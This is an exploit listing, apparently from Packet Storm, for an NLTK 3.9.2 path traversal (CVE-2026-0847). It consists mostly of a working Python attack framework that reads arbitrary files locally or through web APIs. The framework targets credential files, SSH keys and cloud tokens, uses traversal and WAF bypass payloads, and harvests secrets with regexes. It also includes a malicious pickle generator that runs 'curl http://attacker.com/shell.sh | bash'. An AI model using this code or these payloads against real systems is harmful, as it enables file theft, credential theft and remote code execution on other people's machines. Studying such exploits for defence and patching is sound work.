📄 NLTK 3.9.2 Path Traversal / File Disclosure

🗓️ 24 Apr 2026 00:00:00Reported by indoushkaType
packetstorm🔗 packetstorm.news👁 159 Views
Security exploit framework for NLTK 3.9.2 path traversal and file disclosure (CVE-2026-0847).
Reporter	Title	Published	Views	Family All 42
IBM Security Bulletins	Security Bulletin: Multiple Vulnerabilities in NLTK bundled with IBM Fusion, IBM Fusion HCI, and IBM Fusion Content-Aware Storage	17 Jun 202613:55	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Watson Speech Services Cartridge is vulnerable to a Path Traversal in NLTK [CVE-2026-0847]	14 Apr 202615:13	–	ibm
ATTACKERKB	CVE-2026-0847	4 Mar 202618:25	–	attackerkb
BDU FSTEC	The vulnerability of the CorpusReader class in the NLTK library for symbolic and statistical processing of natural language allows a hacker to read arbitrary files.	9 Jun 202600:00	–	bdu_fstec
Circl	CVE-2026-0847	4 Mar 202619:31	–	circl
CNNVD	NLTK 路径遍历漏洞	4 Mar 202600:00	–	cnnvd
CVE	CVE-2026-0847	4 Mar 202618:25	–	cve
Cvelist	CVE-2026-0847 Path Traversal in nltk/nltk	4 Mar 202618:25	–	cvelist
Debian CVE	CVE-2026-0847	4 Mar 202618:25	–	debiancve
EUVD	EUVD-2026-9475	4 Mar 202621:32	–	euvd
==================================================================================================================================
    | # Title     : NLTK 3.9.2 Path Traversal - File Disclosure Exploit                                                              |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://pypi.org/project/nltk/                                                                                   |
    ==================================================================================================================================
    
    [+] Summary    : This script is a security research exploit framework targeting a hypothetical path traversal vulnerability in NLTK-based applications (CVE-2026-0847). 
                     It is designed to how improper file path handling in corpus readers or web APIs can lead to unauthorized file access.
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import os
    import sys
    import json
    import requests
    import argparse
    import logging
    import base64
    from pathlib import Path
    from typing import List, Dict, Optional, Tuple
    from dataclasses import dataclass
    from datetime import datetime
    
    logging.basicConfig(
        level=logging.INFO,
        format='%(asctime)s - %(levelname)s - %(message)s'
    )
    logger = logging.getLogger(__name__)
    @dataclass
    class ExploitResult:
        """Store exploit results"""
        target_file: str
        content: str
        success: bool
        error: str = ""
    
    class NLTKPathTraversalExploit:
        """Main exploit class for CVE-2026-0847"""
        SENSITIVE_FILES = [
            "/etc/passwd",
            "/etc/shadow",
            "/etc/group",
            "/etc/hosts",
            "/etc/hostname",
            "/etc/resolv.conf",
            "/etc/fstab",
            "/etc/crontab",
            "/etc/ssh/sshd_config",
            "/etc/ssh/ssh_config",
            "/etc/ssh/ssh_host_rsa_key",
            "/etc/ssh/ssh_host_ecdsa_key",
            "/etc/ssh/ssh_host_ed25519_key",
            "/etc/sudoers",
            "/etc/sudoers.d/",
            "/var/log/auth.log",
            "/var/log/syslog",
            "/var/log/dpkg.log",
            "/var/log/apt/history.log",
            "/var/log/apache2/access.log",
            "/var/log/apache2/error.log",
            "/var/log/nginx/access.log",
            "/var/log/nginx/error.log",
            "/var/lib/mlocate/mlocate.db",
            "/root/.bash_history",
            "/root/.ssh/id_rsa",
            "/root/.ssh/id_rsa.pub",
            "/root/.ssh/authorized_keys",
            "/.env",
            "/.git/config",
            "/.git/HEAD",
            "/config.json",
            "/config.yaml",
            "/config.yml",
            "/settings.py",
            "/settings.json",
            "/app/config.py",
            "/app/settings.py",
            "/app/secrets.py",
            "/app/.env",
            "/.aws/credentials",
            "/.aws/config",
            "/.azure/credentials",
            "/.azure/config",
            "/.google/credentials.json",
            "/.google/application_default_credentials.json",
            "/.kube/config",
            "/.docker/config.json",
            "/.npmrc",
            "/.pypirc",
            "/.netrc",
            "/.pgpass",
            "/my.cnf",
            ".my.cnf",
            "/mysql.conf",
            "C:/Windows/win.ini",
            "C:/Windows/System32/config/SAM",
            "C:/Windows/System32/config/SYSTEM",
            "C:/Windows/System32/config/SECURITY",
            "C:/Windows/System32/drivers/etc/hosts",
            "C:/Windows/System32/drivers/etc/networks",
            "C:/Windows/System32/drivers/etc/services",
            "C:/Users/Administrator/NTUser.dat",
            "C:/Users/Administrator/Desktop/flag.txt",
            "/.dockerenv",
            "/var/run/secrets/kubernetes.io/serviceaccount/token",
            "/var/run/secrets/kubernetes.io/serviceaccount/namespace",
            "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
            "web.config",
            "appsettings.json",
            "database.yml",
            "secrets.yml",
            "credentials.yml",
            ".htaccess",
            ".htpasswd",
            "id_rsa",
            "id_dsa",
            "id_ecdsa",
            "id_ed25519",
            "ssh_host_key",
        ]
     BYPASS_PAYLOADS = [
            "etc/passwd",
            "etc//passwd",
            "etc/./passwd",
            "etc/../etc/passwd",
            "etc/....//passwd",
            "etc/..;/passwd",
            "etc/%2e%2e/passwd",
            "etc/%252e%252e/passwd",
            "etc/..%252f..%252f..%252fetc/passwd",
            "etc/..%c0%af..%c0%af..%c0%afetc/passwd",
            "etc/..%c1%9c..%c1%9c..%c1%9cetc/passwd",
            "etc/..%c0%ae%c0%ae/",
            "etc/%2e%2e%2fetc%2fpasswd",
            "etc/..%255c..%255c..%255cetc/passwd",
            "etc/..\\..\\..\\etc\\passwd",
            "etc/....//....//....//etc/passwd",
        ]
        
        def __init__(self, target_url: str = None, verbose: bool = False):
            """
            Initialize exploit
            
            Args:
                target_url: Target API endpoint (if remote)
                verbose: Enable verbose output
            """
            self.target_url = target_url
            self.verbose = verbose
            self.session = requests.Session()
            self.session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
            })
            
        def test_local_exploit(self, target_file: str) -> ExploitResult:
            """
            Test exploit locally (direct Python import)
            
            Args:
                target_file: Path to file to read
                
            Returns:
                ExploitResult object
            """
            try:
                from nltk.corpus.reader import WordListCorpusReader, TaggedCorpusReader, BracketParseCorpusReader
                from nltk.corpus.reader.util import FileSystemPathPointer
                root = FileSystemPathPointer("/")
                content = None
                reader_classes = [
                    WordListCorpusReader,
                    TaggedCorpusReader,
                    BracketParseCorpusReader
                ]
                
                for reader_class in reader_classes:
                    try:
                        reader = reader_class(root, [target_file])
                        content = reader.raw(target_file)
                        if content:
                            logger.info(f"[+] Success with {reader_class.__name__}")
                            break
                    except Exception as e:
                        if self.verbose:
                            logger.debug(f"[-] Failed with {reader_class.__name__}: {e}")
                        continue
                
                if content:
                    return ExploitResult(
                        target_file=target_file,
                        content=content,
                        success=True
                    )
                else:
                    return ExploitResult(
                        target_file=target_file,
                        content="",
                        success=False,
                        error="All readers failed"
                    )
                    
            except ImportError as e:
                return ExploitResult(
                    target_file=target_file,
                    content="",
                    success=False,
                    error=f"NLTK not installed: {e}"
                )
            except Exception as e:
                return ExploitResult(
                    target_file=target_file,
                    content="",
                    success=False,
                    error=str(e)
                )
        
        def test_remote_exploit(self, target_file: str, endpoint: str = "/read", method: str = "POST") -> ExploitResult:
            """
            Test exploit remotely via vulnerable API
            
            Args:
                target_file: Path to file to read
                endpoint: API endpoint
                method: HTTP method (POST/GET)
                
            Returns:
                ExploitResult object
            """
            if not self.target_url:
                return ExploitResult(
                    target_file=target_file,
                    content="",
                    success=False,
                    error="No target URL specified"
                )
            
            url = f"{self.target_url.rstrip('/')}{endpoint}"
            
            try:
                if method.upper() == "POST":
                    payload = {"file": target_file, "filename": target_file, "path": target_file}
                    response = self.session.post(url, json=payload, timeout=30)
                else:
                    response = self.session.get(url, params={"file": target_file, "path": target_file}, timeout=30)
                
                if response.status_code == 200 and response.text:
                    return ExploitResult(
                        target_file=target_file,
                        content=response.text,
                        success=True
                    )
                else:
                    return ExploitResult(
                        target_file=target_file,
                        content="",
                        success=False,
                        error=f"HTTP {response.status_code}"
                    )
                    
            except Exception as e:
                return ExploitResult(
                    target_file=target_file,
                    content="",
                    success=False,
                    error=str(e)
                )
        
        def scan_common_files(self, use_bypass: bool = False) -> List[ExploitResult]:
            """
            Scan for common sensitive files
            
            Args:
                use_bypass: Use bypass payloads
                
            Returns:
                List of ExploitResult objects
            """
            results = []
            
            for file_path in self.SENSITIVE_FILES:
                if self.verbose:
                    logger.info(f"[*] Testing: {file_path}")
                
                result = self.test_local_exploit(file_path) if not self.target_url else self.test_remote_exploit(file_path)
                
                if result.success:
                    logger.info(f"[+] FOUND: {file_path} ({len(result.content)} bytes)")
                    results.append(result)
                    self.extract_sensitive_info(result)
                elif self.verbose:
                    logger.debug(f"[-] Not found: {file_path}")
            
            return results
        
        def extract_sensitive_info(self, result: ExploitResult) -> Dict:
            """
            Extract sensitive information from file content
            
            Args:
                result: ExploitResult object
                
            Returns:
                Dictionary of extracted info
            """
            extracted = {}
            
            content = result.content
            if "passwd" in result.target_file:
                users = []
                for line in content.split('\n'):
                    if ':' in line:
                        parts = line.split(':')
                        if len(parts) >= 3:
                            username = parts[0]
                            uid = parts[2]
                            if uid.isdigit() and int(uid) >= 1000:
                                users.append(username)
                if users:
                    extracted['users'] = users
                    logger.info(f"[!] Found users: {', '.join(users)}")
            if "id_rsa" in result.target_file or "ssh_host" in result.target_file:
                if "BEGIN OPENSSH PRIVATE KEY" in content or "BEGIN RSA PRIVATE KEY" in content:
                    extracted['ssh_key'] = content
                    logger.warning("[!!!] SSH PRIVATE KEY FOUND!")
                    key_file = f"extracted_{datetime.now().strftime('%Y%m%d_%H%M%S')}.key"
                    with open(key_file, 'w') as f:
                        f.write(content)
                    logger.info(f"[+] SSH key saved to {key_file}")
            import re
            patterns = {
                'api_key': r'[a-zA-Z0-9_-]{32,}',
                'aws_key': r'AKIA[0-9A-Z]{16}',
                'google_api': r'AIza[0-9A-Za-z_-]{35}',
                'github_token': r'gh[ps]_[0-9a-zA-Z]{36}',
                'slack_token': r'xox[baprs]-[0-9a-zA-Z-]+',
                'jwt': r'eyJ[A-Za-z0-9-_=]+\.[A-Za-z0-9-_=]+\.?[A-Za-z0-9-_.+/=]*',
                'password': r'password[\s]*[:=][\s]*["\']?([^"\'\s]+)["\']?',
                'secret': r'secret[\s]*[:=][\s]*["\']?([^"\'\s]+)["\']?',
            }
            
            for pattern_name, pattern in patterns.items():
                matches = re.findall(pattern, content, re.IGNORECASE)
                if matches:
                    extracted[pattern_name] = matches[:10]  # Limit to first 10
                    logger.warning(f"[!!!] Found {len(matches)} {pattern_name.upper()} tokens")
            
            return extracted
        
        def generate_exploit_payloads(self) -> List[str]:
            """
            Generate path traversal payloads for different scenarios
            
            Returns:
                List of payload strings
            """
            targets = [
                "../../../../../../etc/passwd",
                "../../../../../../etc/shadow",
                "../../../../../../root/.ssh/id_rsa",
                "../../../../../../var/log/auth.log",
                "..\\..\\..\\..\\..\\..\\Windows\\win.ini",
            ]
            
            payloads = []
            for target in targets:
                for bypass in self.BYPASS_PAYLOADS:
                    if bypass.startswith('etc'):
                        payloads.append(bypass)
                    else:
                        payloads.append(target.replace('etc/passwd', bypass))
            
            return list(set(payloads))
        
        def create_malicious_nltk_file(self, output_file: str = "malicious.nltk") -> str:
            """
            Create a malicious NLTK corpus file
            
            Args:
                output_file: Output filename
                
            Returns:
                Path to created file
            """
            import pickle
            
            # Malicious pickle payload for RCE (when combined with NLTK deserialization)
            class MaliciousPickle:
                def __reduce__(self):
                    import os
                    return (os.system, ('curl http://attacker.com/shell.sh | bash',))
            
            with open(output_file, 'wb') as f:
                pickle.dump(MaliciousPickle(), f)
            
            logger.warning(f"[!] Created malicious pickle file: {output_file}")
            logger.warning("[!] This can lead to RCE if loaded by NLTK")
            
            return output_file
    class AttackVector:
        """Different attack vectors for the vulnerability"""
        
        @staticmethod
        def flask_api_exploit(target_url: str, files: List[str]) -> None:
            """
            Exploit via Flask API endpoint
            """
            logger.info(f"[*] Attacking Flask API at {target_url}")
            
            for file_path in files:
                try:
                    response = requests.post(
                        f"{target_url}/read",
                        json={"file": file_path},
                        timeout=10
                    )
                    if response.status_code == 200:
                        logger.info(f"[+] Read {file_path}: {len(response.text)} bytes")
                        safe_name = file_path.replace('/', '_').replace('\\', '_')
                        with open(f"exfil_{safe_name}.txt", 'w') as f:
                            f.write(response.text)
                except Exception as e:
                    logger.error(f"[-] Failed: {e}")
        
        @staticmethod
        def django_api_exploit(target_url: str, files: List[str]) -> None:
            """
            Exploit via Django REST API
            """
            logger.info(f"[*] Attacking Django API at {target_url}")
            
            for file_path in files:
                try:
                    response = requests.get(
                        f"{target_url}/api/corpus/",
                        params={"file": file_path},
                        timeout=10
                    )
                    if response.status_code == 200:
                        logger.info(f"[+] Read {file_path}")
                except Exception as e:
                    logger.error(f"[-] Failed: {e}")
        
        @staticmethod
        def fastapi_exploit(target_url: str, files: List[str]) -> None:
            """
            Exploit via FastAPI endpoint
            """
            logger.info(f"[*] Attacking FastAPI at {target_url}")
            
            for file_path in files:
                try:
                    response = requests.post(
                        f"{target_url}/process",
                        json={"corpus_file": file_path},
                        timeout=10
                    )
                    if response.status_code == 200:
                        logger.info(f"[+] Read {file_path}")
                except Exception as e:
                    logger.error(f"[-] Failed: {e}")
    def main():
        parser = argparse.ArgumentParser(
            description='CVE-2026-0847 - NLTK Path Traversal Exploit',
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="""
    Examples:
    
      python exploit.py --local --file /etc/passwd
      python exploit.py --local --scan
      python exploit.py --url http://target.com:8000 --file etc/passwd
      python exploit.py --url http://target.com:8000 --scan --bypass
      python exploit.py --generate-pickle malicious.nltk
            """
        )
        
        parser.add_argument('--local', action='store_true', help='Local exploit (direct Python)')
        parser.add_argument('--url', help='Target URL for remote exploit')
        parser.add_argument('--file', help='Single file to read')
        parser.add_argument('--scan', action='store_true', help='Scan common sensitive files')
        parser.add_argument('--bypass', action='store_true', help='Use WAF bypass payloads')
        parser.add_argument('--output', '-o', help='Output file for results')
        parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
        parser.add_argument('--generate-pickle', metavar='FILE', help='Generate malicious pickle file')
        parser.add_argument('--endpoint', default='/read', help='API endpoint (default: /read)')
        parser.add_argument('--method', choices=['GET', 'POST'], default='POST', help='HTTP method')
        
        args = parser.parse_args()
    
        if args.generate_pickle:
            exploit = NLTKPathTraversalExploit()
            exploit.create_malicious_nltk_file(args.generate_pickle)
            return
    
        if not args.local and not args.url:
            parser.error("Either --local or --url must be specified")
        exploit = NLTKPathTraversalExploit(
            target_url=args.url,
            verbose=args.verbose
        )
        
        results = []
        if args.file:
            logger.info(f"[*] Reading file: {args.file}")
            
            if args.local:
                result = exploit.test_local_exploit(args.file)
            else:
                result = exploit.test_remote_exploit(args.file, args.endpoint, args.method)
            
            if result.success:
                logger.info(f"[+] Success! Content length: {len(result.content)} bytes")
                print("\n" + "="*60)
                print(result.content[:2000]) 
                print("="*60)
                
                if len(result.content) > 2000:
                    print(f"\n... (truncated, total {len(result.content)} bytes)")
                
                results.append(result)
    
                if args.output:
                    with open(args.output, 'w') as f:
                        f.write(result.content)
                    logger.info(f"[+] Saved to {args.output}")
            else:
                logger.error(f"[-] Failed: {result.error}")
    
        if args.scan:
            logger.info("[*] Scanning for sensitive files...")
            
            if args.local:
                if args.bypass:
                    logger.warning("[!] Bypass mode not applicable for local exploit")
                
                files_to_test = NLTKPathTraversalExploit.SENSITIVE_FILES
                for file_path in files_to_test[:20]:  
                    result = exploit.test_local_exploit(file_path)
                    if result.success:
                        results.append(result)
                        logger.info(f"[+] Found: {file_path}")
            else:
                files_to_test = NLTKPathTraversalExploit.SENSITIVE_FILES
                if args.bypass:
                    bypass_payloads = exploit.generate_exploit_payloads()
                    for payload in bypass_payloads[:50]:
                        result = exploit.test_remote_exploit(payload, args.endpoint, args.method)
                        if result.success:
                            results.append(result)
                            logger.info(f"[+] Found with bypass: {payload}")
                else:
                    for file_path in files_to_test[:30]:
                        result = exploit.test_remote_exploit(file_path, args.endpoint, args.method)
                        if result.success:
                            results.append(result)
                            logger.info(f"[+] Found: {file_path}")
    
        if results:
            print("\n" + "="*60)
            print("EXPLOIT SUMMARY")
            print("="*60)
            print(f"Total files read: {len(results)}")
            
            for result in results:
                print(f"\n[+] {result.target_file}: {len(result.content)} bytes")
                lines = result.content.split('\n')[:5]
                for line in lines:
                    if line.strip():
                        print(f"    {line[:100]}")
    
            if args.output and args.output.endswith('.json'):
                with open(args.output, 'w') as f:
                    json.dump([
                        {
                            'file': r.target_file,
                            'size': len(r.content),
                            'content': r.content[:10000]
                        }
                        for r in results
                    ], f, indent=2)
                logger.info(f"[+] Results saved to {args.output}")
        
        else:
            logger.warning("[!] No files were successfully read")
        
        logger.info("[+] Exploit completed")
    
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
24 Apr 2026 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.17.5
CVSS 38.6
EPSS0.00924
SSVC